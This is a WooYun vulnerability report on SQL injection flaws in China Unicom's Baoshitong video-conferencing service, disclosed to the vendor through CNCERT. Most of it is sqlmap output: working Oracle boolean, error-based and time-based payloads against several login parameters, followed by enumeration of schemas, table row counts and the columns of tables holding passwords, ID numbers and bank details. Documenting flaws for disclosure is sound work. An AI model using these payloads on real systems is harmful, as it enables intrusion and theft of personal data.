当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145995

漏洞标题:中国联通宝视通业务存在多个参数存在SQL注入(涉及9个数据库以及大量的数据信息可被泄漏)

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-10-11 14:41

修复时间:2015-11-30 09:06

公开时间:2015-11-30 09:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

某处存在多个参数SQL注入,设计9个数据库,以及会使大量的数据信息泄漏

详细说明:

http://**.**.**.**/bugs/wooyun-2015-0136114
里面提到了http://**.**.**.**/manager/login.cfm地址,
洞主说了有弱口令,但是这么久了,应该修复了吧,测试果然已经没有这个好果子了啊!~~~
进行注入测试呢?发现能力不足,没能测试出来,sqlmap神器也没有用,那么就放弃了吗?
无聊,将地址后面的内容删掉发现到了另外一个地方
http://**.**.**.**/
右上角有一个English,点击后来到另一个地址
http://**.**.**.**/newtvuser_eng/index1.cfm
同样第一个地址点击“视讯会议”后会来到
http://**.**.**.**/newtvuser/index1.cfm
可以看出来一个是英文的,一个是中文的而已
http://**.**.**.**/
……
http://**.**.**.**/
一样
New Conference进入后进行抓包

http://**.**.**.**/newtvuser_eng/logincheck.cfm (POST)
subway=1&id=18315&sysname=admin&syspass=d7ae0c107d07a3e5649785bc12d34014&submit2.x=26&submit2.y=9


1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace (original value)
    Payload: subway=1&id=(SELECT (CASE WHEN (8593=8593) THEN 18315 ELSE CAST(1 A
S INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)&sysname=admin&syspass=d7ae0c107d07a3
e5649785bc12d34014&submit2.x=26&submit2.y=9
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: subway=1&id=18315 AND 5000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||
CHR(113)||CHR(114)||CHR(108)||CHR(119)||CHR(113)||(SELECT (CASE WHEN (5000=5000)
 THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(108)||CHR(99)||CHR(122)||CHR(113)|
|CHR(62))) FROM DUAL)&sysname=admin&syspass=d7ae0c107d07a3e5649785bc12d34014&sub
mit2.x=26&submit2.y=9
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: subway=1&id=18315 AND 6913=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_U
SERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sysname=admin&syspass=d7ae0c107d
07a3e5649785bc12d34014&submit2.x=26&submit2.y=9
---
[11:25:02] [INFO] the back-end DBMS is Oracle
web application technology: ColdFusion
back-end DBMS: Oracle
[11:25:02] [INFO] fetching current user
[11:25:02] [INFO] resumed: MCU
current user:    'MCU'
[11:25:02] [INFO] fetching current database
[11:25:02] [INFO] resumed: MCU
[11:25:02] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'MCU'
[11:25:02] [INFO] testing if current user is DBA
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
current user is DBA:    False


database management system users [27]:
[*] ANONYMOUS
[*] BACKUP
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MCU
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NETMNG
[*] NOAHSOFT
[*] OLAPSYS
[*] ORA_MONITOR
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SDTMAINTAIN
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


available databases [9]:
[*] CTXSYS
[*] EXFSYS
[*] MCU
[*] MDSYS
[*] NOAHSOFT
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS


Database: MCU
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| END_PARTY                      | 2091945 |    这个200多万的数据是啥?
| STAT_DAY_TERMDISC              | 2005892 |
| STAT_CONF_DETAIL               | 1982752 |
| STAT_MONTH_CONFDUR_TMP         | 1781997 |
| STAT_P2P_DETAIL                | 1594103 |
| END_PARTY_20120625             | 1346753 |
| TERMINAL_SEQUENCE              | 1000000 |
| END_PORT_SCHEDULE              | 675669  |
| ADMIN_LOG_CONF_CONTROL         | 346447  |    管理员会议控制记录?
| ADMIN_LOG_20111219             | 320167  |    管理员记录备份?
| ADMIN_LOG                      | 288829  |    管理员记录?
| STAT_DAY_CONFDISC              | 257599  |
| STAT_DAY_MCU                   | 253309  |    这个是啥呢?
| TERMINAL_DISCOUNT_20120827     | 187672  |
| TERMINAL_DISCOUNT              | 182010  |
| END_MCUS                       | 160201  |    这个又是啥?
| END_RESERVATION                | 160201  |
| END_PREVIEW                    | 139998  |
| STAT_DAY_CONFDISC_NEW          | 85999   |
| END_TERMINAL_DISCOUNT          | 79507   |
| NH_STAT_DAY                    | 77201   |
| STAT_MONTH_P2P                 | 51110   |
| END_VIDEO_SCHEDULE             | 49561   |
| STAT_REPORT_TERMIND            | 47076   |
| HISTORY_PARTY                  | 33992   |
| STAT_REPORT_CONFCOU            | 32844   |
| STAT_REPORT_CONFDUR            | 32844   |
| TMP_ADMIN_LOG                  | 31707   |    有一个TMP管理员记录?
| HISTORY_PARTY20121213          | 29352   |
| HISTORY_PARTY20130629          | 29344   |
| HISTORY_PARTY_20130124         | 29193   |
| HISTORY_PARTY_20130411         | 28241   |
| TERMINAL_BILL_LIST             | 28211   |
| HISTORY_PARTY20120119          | 28200   |
| STAT_MONTH_VIP                 | 23843   |
| TERMINAL_3GBAK_20141017        | 23159   |
| TERMINAL_20120517              | 23035   |
| TERMINAL_20131204              | 23004   |
| TERMINAL_20130608              | 22998   |
| TERMINAL_20130923              | 22979   |
| DQX_TEST                       | 22969   |
| TERMINAL_20130705              | 22966   |
| TERMINAL20130629               | 22964   |
| TERMINAL_20130401              | 22953   |
| TERMINAL_20130411              | 22953   |
| TERMINAL_20130124              | 22944   |
| TERMINAL20121213               | 22932   |
| TERMINAL_20121028              | 22910   |
| TERMINAL_BSSOK                 | 22910   |
| TERMINAL20120119               | 22858   |
| TERMINAL_20111219              | 22827   |
| TERMINAL                       | 22618   |
| TEMPLATE_PARTY                 | 22470   |
| TEMPLATE_PARTY_20130124        | 18336   |
| TEMPLATE_PARTY20121213         | 18311   |
| TEMPLATE_PARTY20130629         | 17962   |
| TEMPLATE_PARTY_20130411        | 17939   |
| ERR_PREVIEW_TERMINAL           | 17343   |
| CIRCUIT_RES20120517            | 16683   |
| TERMINALLT20130520             | 16427   |
| TEMPLATE_PARTY20120119         | 16335   |
| CIRCUIT_RES                    | 15931   |
| TEMPLATE_PARTY_20110703        | 15657   |
| BSS_ADMIN_LOG                  | 13951   |    BSS管理员记录
| CURVE_ERRORLOG                 | 13560   |
| END_TERMINAL_BILL_LIST         | 12277   |
| END_TERMINAL                   | 10604   |
| NH_STAT_DAY_20110623           | 10285   |
| END_TERMINAL_20121028          | 9891    |
| USER_INFO                      | 6040    |    用户信息
| USER_INFO20130629              | 5848    |    用户信息备份
| USER_INFO_20121028             | 5637    |    用户信息备份
| END_TERMINAL_ONOFF_DATE        | 5544    |
| ADMIN_PROC_LOG                 | 5394    |    管理员啥记录这是?
| NH_REPEATPARTY                 | 4551    |
| TERMINALLT20130520_1           | 4048    |
| HISTORY_PREVIEW                | 2880    |
| HISTORY_PREVIEW20130629        | 2411    |
| HISTORY_PREVIEW_20130411       | 2397    |
| HISTORY_PREVIEW20121213        | 2371    |
| HISTORY_PREVIEW20120119        | 2197    |
| HISTORY_PREVIEW20111018        | 2157    |
| HISTORY_PREVEW20110919         | 2144    |
| STAT_USER_TERM_CAREER          | 2127    |    用户职业?
| END_USER_INFO                  | 2083    |    END用户信息?
| END_USER_INFO_20121028         | 2061    |    END用户信息备份?
| STAT_MONTH_P2P_TEMP20110525    | 1956    |
| TALIAS_TMP                     | 1789    |
| OPERATOR_ROLE_20111219         | 1429    |
| OPERATOR_INFO_20111219         | 1360    |
| OPERATOR_ROLE20110801          | 1356    |
| STAT_MONTH_CONFDISC            | 1331    |
| SUBGROUP_INFO                  | 1171    |
| TEMPLATE_PREVIEW               | 1138    |
| CGLOBAL                        | 998     |
| TEMPLATE_PREVIEW_20130411      | 937     |
| TEMPLATE_PREVIEW20130629       | 927     |
| TEMPLATE_PREVIEW20121213       | 915     |
| TEMPLATE_PREVIEW20120119       | 835     |
| TEMPLATE_PREVIEW20111018       | 800     |
| TEMPLATE_PREVEW20110919        | 789     |
| TEMPLATE_PREVIEW_20110703      | 782     |
| TEMP_TABLE                     | 758     |
| OPERATOR_ROLE                  | 749     |
| APPROVE_PARTY20130629          | 593     |
| ERR_PREVIEW                    | 576     |
| OPERATOR_INFO                  | 516     |
| ADMIN_LOGTEST                  | 507     |    管理员测试记录
| NH_USER_ATTR                   | 492     |    用户啥没看懂
| NETUSER                        | 461     |    NET用户
| TERMINAL_ONOFF_DATE            | 421     |
| CITY_TELE_RES                  | 394     |
| GROUP_INFO                     | 393     |
| CITY_INFO                      | 388     |
| TEMPL_PARTY                    | 383     |
| CAREER_GROUP_INFO              | 379     |
| GROUP_INFO_NEW                 | 375     |
| GROUP_INFO_OLD                 | 368     |
| TERMINAL_NH_SICHUAN            | 363     |
| CITY_TELE_RES_20111018         | 360     |
| CITY_TELE_RES_20111129         | 360     |
| CITY_TELE_RES_20111207         | 360     |
| CITY_TELE_RES_20111219         | 360     |
| CITY_INFO20121031              | 356     |
| CITY_INFO_20121028             | 356     |
| SP_ERR_RECORD                  | 356     |
| CDATA                          | 345     |
| TERMINAL_BRAND_TMP             | 337     |
| PARTY20130629                  | 309     |
| SERVICE_IP_RES20130916         | 304     |
| SERVICE_RES20130916            | 304     |
| SERVICE_IP_RES                 | 298     |
| SERVICE_RES                    | 298     |
| NHUSER20130701                 | 269     |    NH用户备份
| END_PARTY_20120614             | 248     |
| APPROVE_PARTY20121213          | 222     |
| NH_STAT_TEMP                   | 215     |
| NATION_INFO                    | 189     |
| TEMPTEST                       | 178     |
| TERMINAL_BILL_CONFIG           | 152     |
| TERMINAL_NH20121219            | 147     |
| TERMINAL_ALIAS_TMP             | 144     |
| CONTACT_INFO                   | 127     |
| TERMINAL20121205               | 127     |
| MCU_RES20130916                | 126     |
| MCU_RES                        | 125     |
| MCU_RES_3GBAK_20141017         | 125     |
| NH_USER_ATTR20130629           | 119     |    NH用户啥信息备份
| MCU_RES20120331                | 108     |
| MCU_RES_20111220               | 104     |
| TERMINAL_TMP                   | 104     |
| TEMPL_PREVIEW                  | 80      |
| TERMINAL_TMP_20121101          | 60      |
| STAT_REPORT                    | 55      |
| PARTY                          | 54      |
| NH_SUBGROUP_ATTRIBUTE_INFO     | 51      |
| NH_SUBGROUP_ATTR_INFO20130629  | 41      |
| PROVINCE_INFO                  | 39      |
| PROVINCE_INFO_20121028         | 39      |
| RMX4000_PORTNUM_RES            | 38      |
| RESERVATION20130629            | 33      |
| OTHER_INFO                     | 27      |
| GK_NEIGHBOR                    | 26      |
| OTHER_INFO_3GBAK_20141017      | 26      |
| ROLE_OPERATOR_CODE             | 26      |
| GK_NEIGHBOR_20111219           | 25      |
| GK_NEIGHBOR_20111207           | 24      |
| OTHER_INFO20131211             | 24      |
| GK_NEIGHBOR_20111129           | 23      |
| TERMINAL_OPERAT_TYPE20121028   | 23      |
| TERMINAL_OPERATION_TYPE        | 23      |
| GK_NEIGHBOR_20111018           | 22      |
| OPERATOR_TYPE                  | 22      |
| RMX4000_PORTNUM_RES20130629    | 22      |
| GK_RES                         | 21      |
| GK_RES20120331                 | 21      |
| PBCATEDT                       | 21      |
| CONFIG_HOST_ADDRESS            | 20      |
| GK_RES_20111219                | 20      |
| PBCATFMT                       | 20      |
| PORT_SCHEDULE                  | 20      |
| TERMINAL_3G_TEMPDATA_20141018  | 20      |
| GK_RES_20111207                | 19      |
| OPERATOR_TYPE_20111219         | 19      |
| TERMINAL_DISCOUNT_T            | 19      |
| GK_RES_20111129                | 18      |
| FEERATE_PATTERNS               | 17      |
| GK_RES_20111018                | 17      |
| OTHER_INFO20130629             | 17      |
| TERMINAL_BILL_PATTERN          | 17      |
| TERMINAL_BILL_PATTERN_20121028 | 17      |
| END_TERMINAL_3G                | 16      |
| SUB_TERMINAL_ATTRIBUTE_INFO    | 16      |
| OTHER_INFO_20121028            | 15      |
| REGION_GROUPS_UNION            | 15      |
| GROUP_HOST_ADDRESS_20130830    | 14      |
| OTHER_INFO20120118             | 14      |
| ROLE_RES                       | 14      |
| CPNUM_RES                      | 13      |
| HOTEL_RES                      | 13      |
| TERMINAL_OPERATIONTYPE20121028 | 13      |
| GROUP_HOST_ADDRESS20130629     | 12      |
| PARTY_0315                     | 12      |
| APPROVE_PREVIEW20130629        | 11      |
| PREVIEW20130629                | 11      |
| GK_ADDZERO                     | 10      |
| HIGHRATE_INFO                  | 10      |
| HOST_ADDRESS_20131018          | 10      |
| CONFIG_HOST_ADDRESS_20131018   | 9       |
| TMP_LOG                        | 9       |
| MEETINGROOM_RES                | 8       |
| NHUSER20130722                 | 8       |    NH用户备份
| TERMINAL_ATTRIBUTE_INFO        | 8       |
| TERMINAL_BRAND_TYPE            | 8       |
| TERMINAL_TMP20130111           | 8       |
| APPROVE_PREVIEW20121213        | 7       |
| CAREER_INFO                    | 7       |
| CONTINENT_INFO                 | 7       |
| CONTINENT_INFO_20121028        | 7       |
| HOTEL_STAR_INFO                | 7       |
| ADEPT                          | 6       |
| CALLRIGHT_INFO                 | 6       |
| CERTIFICATE_INFO               | 6       |
| GROUP_HOST_ADDRESS             | 6       |
| GZWHOST_ADDRESS                | 6       |
| HIGHMCU_CONFIG_RES             | 6       |
| LOGINKEY                       | 6       |
| MCU_PARAMTER_CONFIG            | 6       |
| NOTICE_INFO                    | 6       |
| RATE_INFO                      | 6       |
| RESOLUTION_VIDEOPROTOCOL_RES   | 6       |
| SUBGROUP_ATTRIBUTE_INFO        | 6       |
| BILL_MANNER_INFO               | 5       |
| DIC_TELT                       | 5       |
| HOTEL_BELIEVE_INFO             | 5       |
| MEETINGROOM_CONTENT_INFO       | 5       |
| TERMINAL_BRAND                 | 5       |
| HOST_DNSCONFIG                 | 4       |
| RESOLUTION_RES                 | 4       |
| TERMINAL_3G                    | 4       |
| CNUNIET_TERMINAL               | 3       |
| CONFIG_VISUAL_PATH             | 3       |
| END_CONTACT_INFO               | 3       |
| GROUP_OTHER_INFO20130629       | 3       |
| NH_ALLCONF_MASTERMCU20130629   | 3       |
| NH_HIGHMCU_CONFIG_RES20130629  | 3       |
| NH_LEVEL_INFO                  | 3       |
| RESOLUTION_RES20130629         | 3       |
| TERMINAL_BILL_LIST_T           | 3       |
| TRANS_RECORD                   | 3       |
| USER_ATTRIBUTE_INFO            | 3       |    用户信息
| APPROVE_USER_INFO              | 2       |    证明用户信息?
| GROUP_OTHER_INFO               | 2       |
| MCUS                           | 2       |
| NETWORK_RES                    | 2       |
| NETWORK_RES_20121028           | 2       |
| NH_LEVEL_INFO20130629          | 2       |
| NH_USER_ATTR_INFO              | 2       |    有时一些信息
| NHUSER20130710                 | 2       |    又是用户信息备份
| PORT_CURVE                     | 2       |
| PREVIEW                        | 2       |
| RESERVATION                    | 2       |
| VIDEO_SCHEDULE                 | 2       |
| BBSS_ADD_TERMINAL              | 1       |    BBSS增加终端?
| CONF_DEFAULT_PARA_CONFIG       | 1       |
| HOST_ADDRESS                   | 1       |    主机地址?
| LOG_SCHEDULE                   | 1       |
| MCUS_0315                      | 1       |
| RESERVATION_0315               | 1       |
| SPGROUP_INFO                   | 1       |
| TERMINAL20121228               | 1       |
| TERMINAL_ALIAS_INFO            | 1       |
| TERMINAL_GK_INFO               | 1       |
| TERMINAL_T                     | 1       |
+--------------------------------+---------+
web application technology: ColdFusion
back-end DBMS: Oracle
Database: MCU
Table: END_PARTY
[51 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| ACTION           | NUMBER   |
| VERSION          | NUMBER   |
| AGGREGATION      | NUMBER   |
| ALIAS            | VARCHAR2 |
| ALIASTYPE        | NUMBER   |
| AUTHENPASSWD     | VARCHAR2 |
| AUTODETECT       | NUMBER   |
| BITRATE323       | NUMBER   |
| BONDINGNUMBER    | VARCHAR2 |
| CASCADEMCU       | VARCHAR2 |
| CASCADESERVICE   | VARCHAR2 |
| CASECADE         | VARCHAR2 |
| CHAIR            | NUMBER   |
| CITY_CODE        | VARCHAR2 |
| CONNECTIONTYPE   | NUMBER   |
| EMAIL            | VARCHAR2 |
| ENHANCEDVIDEO    | NUMBER   |
| FRAME            | NUMBER   |
| GROUPID          | NUMBER   |
| H320CHAIR        | NUMBER   |
| ID               | NUMBER   |
| INTERFACETYPE    | NUMBER   |
| IPADDRESS        | VARCHAR2 |
| LABELID          | NUMBER   |
| MASTERCONFT      | NUMBER   |
| MCU_ALIAS        | VARCHAR2 |
| MCUNAME          | VARCHAR2 |
| MCUPHONENUMBER   | VARCHAR2 |
| MEETMEPER        | NUMBER   |
| NAME             | VARCHAR2 |
| NEWPARTY         | NUMBER   |
| NUMBEROFCHANNELS | NUMBER   |
| NUMTYPE          | NUMBER   |
| OWNERID          | NUMBER   |
| PARTYPHONENUMBER | VARCHAR2 |
| PROVID           | VARCHAR2 |
| RESERV_FLAG      | NUMBER   |
| RESID            | NUMBER   |
| RESOLUTION_CODE  | NUMBER   |
| RESTRICTED       | NUMBER   |
| SEQNUM           | NUMBER   |
| SERVICE          | VARCHAR2 |
| SIGNALPORT323    | NUMBER   |
| STATUS           | NUMBER   |
| SUBSERVICE       | VARCHAR2 |
| TERMINALTYPE     | NUMBER   |
| USEPORT          | NUMBER   |
| USERNAME         | VARCHAR2 |
| VIDEOPROTOCOL    | NUMBER   |
| VOICE            | NUMBER   |
| VOLUME           | NUMBER   |
+------------------+----------+


2.jpg


可以看到AUTHENPASSWD认证的密码

| END_MCUS                       | 160201  |
| USER_INFO                      | 6040    |
| END_USER_INFO                  | 2083    |
| MCUS                           | 2       |
Database: MCU
Table: END_USER_INFO
[44 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| ACCOUNT            | VARCHAR2 |
| ACCOUNT_FUNCTION   | NUMBER   |
| ACCOUNT_TYPE       | NUMBER   |
| ADDRESS            | VARCHAR2 |
| BANK_NAME          | VARCHAR2 |
| BILL_CONTENT       | NUMBER   |
| BILL_RECEIVER_FAX  | VARCHAR2 |
| BILL_RECEIVER_NAME | VARCHAR2 |
| BILL_SEND_ADDRESS  | VARCHAR2 |
| BILL_SEND_POSTCODE | CHAR     |
| BONDING_USERID     | VARCHAR2 |
| BUSINESS_TELEPHONE | VARCHAR2 |
| CAREER             | VARCHAR2 |
| CERTIFICATE_NUMBER | VARCHAR2 |
| CERTIFICATE_TYPE   | VARCHAR2 |
| CITY               | VARCHAR2 |
| CONTINENT_CODE     | NUMBER   |
| CREATE_DATE        | VARCHAR2 |
| EMAIL              | VARCHAR2 |
| FAX                | VARCHAR2 |
| FINA_FLAG          | NUMBER   |
| GROUP_NAME         | VARCHAR2 |
| NAME               | VARCHAR2 |
| NATION_CODE        | CHAR     |
| PASSWORD           | VARCHAR2 |
| PAY_MODE           | VARCHAR2 |
| POST_CODE          | VARCHAR2 |
| PROVINCE           | VARCHAR2 |
| REPRESENTATION     | VARCHAR2 |
| RESPOND            | VARCHAR2 |
| SEQUENCE_ID        | NUMBER   |
| SUBGROUP_NAME      | VARCHAR2 |
| TELEPHONE          | VARCHAR2 |
| TERMINAL_NUMBER    | VARCHAR2 |
| UNIT_NAME          | VARCHAR2 |
| UNREG_DATE         | DATE     |
| USE_DATE           | VARCHAR2 |
| USE_IVR            | VARCHAR2 |
| USE_TOKEN          | VARCHAR2 |
| USER_ATTRIBUTE     | VARCHAR2 |
| USER_ID            | VARCHAR2 |
| USER_NAME          | VARCHAR2 |
| USER_RIGHT         | VARCHAR2 |
| USER_TYPE          | VARCHAR2 |
+--------------------+----------+
Database: MCU
Table: USER_INFO
[47 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| ACCOUNT            | VARCHAR2 |
| ACCOUNT_FUNCTION   | NUMBER   |
| ACCOUNT_TYPE       | NUMBER   |
| ADDRESS            | VARCHAR2 |
| BANK_NAME          | VARCHAR2 |
| BILL_CONTENT       | NUMBER   |
| BILL_RECEIVER_FAX  | VARCHAR2 |
| BILL_RECEIVER_NAME | VARCHAR2 |
| BILL_SEND_ADDRESS  | VARCHAR2 |
| BILL_SEND_POSTCODE | CHAR     |
| BONDING_USERID     | VARCHAR2 |
| BUSINESS_TELEPHONE | VARCHAR2 |
| CAREER             | VARCHAR2 |
| CERTIFICATE_NUMBER | VARCHAR2 |
| CERTIFICATE_TYPE   | VARCHAR2 |
| CITY               | VARCHAR2 |
| CONTACT_NAME       | VARCHAR2 |
| CONTINENT_CODE     | NUMBER   |
| CREATE_DATE        | VARCHAR2 |
| EMAIL              | VARCHAR2 |
| EMAIL_SWITCH       | NUMBER   |
| FAX                | VARCHAR2 |
| GROUP_NAME         | VARCHAR2 |
| MESSAGE_SWITCH     | NUMBER   |
| MOBILETEL          | VARCHAR2 |
| NAME               | VARCHAR2 |
| NATION_CODE        | CHAR     |
| PASSWORD           | VARCHAR2 |
| PAY_MODE           | VARCHAR2 |
| POST_CODE          | VARCHAR2 |
| PROVINCE           | VARCHAR2 |
| RANDOM_CODE        | VARCHAR2 |
| REGISTER_GK        | NUMBER   |
| REPRESENTATION     | VARCHAR2 |
| RESPOND            | VARCHAR2 |
| SUBGROUP_NAME      | VARCHAR2 |
| TELEPHONE          | VARCHAR2 |
| TERMINAL_NUMBER    | VARCHAR2 |
| UNIT_NAME          | VARCHAR2 |
| USE_DATE           | VARCHAR2 |
| USE_IVR            | VARCHAR2 |
| USE_TOKEN          | VARCHAR2 |
| USER_ATTRIBUTE     | VARCHAR2 |
| USER_ID            | VARCHAR2 |
| USER_NAME          | VARCHAR2 |
| USER_RIGHT         | VARCHAR2 |
| USER_TYPE          | VARCHAR2 |
+--------------------+----------+
Database: MCU
Table: MCUS
[14 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| FIRSTNUMBER      | VARCHAR2 |
| GROUPID          | NUMBER   |
| ID               | NUMBER   |
| IP               | VARCHAR2 |
| LASTNUMBER       | VARCHAR2 |
| LOGIN            | VARCHAR2 |
| MCU_VERSION_TYPE | NUMBER   |
| MCUORDER         | NUMBER   |
| NAME             | VARCHAR2 |
| PASSWORD         | VARCHAR2 |
| PORTNUMBER       | NUMBER   |
| PREFIX           | VARCHAR2 |
| TTCMUSED         | NUMBER   |
| TYPE             | NUMBER   |
+------------------+----------+
Database: MCU
Table: END_MCUS
[14 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| FIRSTNUMBER      | VARCHAR2 |
| GROUPID          | NUMBER   |
| ID               | NUMBER   |
| IP               | VARCHAR2 |
| LASTNUMBER       | VARCHAR2 |
| LOGIN            | VARCHAR2 |
| MCU_VERSION_TYPE | NUMBER   |
| MCUORDER         | NUMBER   |
| NAME             | VARCHAR2 |
| PASSWORD         | VARCHAR2 |
| PORTNUMBER       | NUMBER   |
| PREFIX           | VARCHAR2 |
| TTCMUSED         | NUMBER   |
| TYPE             | NUMBER   |
+------------------+----------+


3.jpg


6.jpg


其余的数据库就不列出来了!~~~
注入点二:

http://**.**.**.**/confcontrol_eng/mainnew/sublogincheck.asp?
controlserver=**.**.**.**&webserver=**.**.**.**&ConfName=admin&ConfPwd=111111
&TerminalAuth=123456&submit2.x=30&submit2.y=17 (GET)


ConfName,ConfPwd,TerminalAuth均存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: ConfPwd
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: controlserver=**.**.**.**&webserver=video2.dynns.
**.**.**.**&ConfName=admin&ConfPwd=111111' AND 1244=(SELECT UPPER(XMLType(CHR(6
0)||CHR(58)||CHR(113)||CHR(119)||CHR(111)||CHR(120)||CHR(113)||(SELECT (CASE WHE
N (1244=1244) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(102)||CHR(1
20)||CHR(113)||CHR(62))) FROM DUAL) AND 'knXb'='knXb&TerminalAuth=123456&submit2
.x=30&submit2.y=17
Place: GET
Parameter: TerminalAuth
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: controlserver=**.**.**.**&webserver=video2.dynns.
**.**.**.**&ConfName=admin&ConfPwd=111111&TerminalAuth=123456' AND 2273=(SELECT
 UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(111)||CHR(120)||CHR(113
)||(SELECT (CASE WHEN (2273=2273) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(1
09)||CHR(102)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'WNaw'='WNaw&submit2
.x=30&submit2.y=17
Place: GET
Parameter: ConfName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: controlserver=**.**.**.**&webserver=video2.dynns.
**.**.**.**&ConfName=admin' AND 5044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CH
R(113)||CHR(119)||CHR(111)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5044=5044) T
HEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(102)||CHR(120)||CHR(113)||
CHR(62))) FROM DUAL) AND 'ksik'='ksik&ConfPwd=111111&TerminalAuth=123456&submit2
.x=30&submit2.y=17
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: ConfPwd, type: Single quoted string (default)
[1] place: GET, parameter: TerminalAuth, type: Single quoted string
[2] place: GET, parameter: ConfName, type: Single quoted string
[q] Quit
> 0
[13:30:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[13:30:03] [INFO] fetching current user
[13:30:03] [INFO] retrieved: MCU
current user:    'MCU'
[13:30:03] [INFO] fetching current database
[13:30:03] [INFO] resumed: MCU
[13:30:03] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'MCU'
[13:30:03] [INFO] testing if current user is DBA
current user is DBA:    False


4.jpg


5.jpg

漏洞证明:

2.jpg


3.jpg


6.jpg


修复方案:

你们懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-16 09:05

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无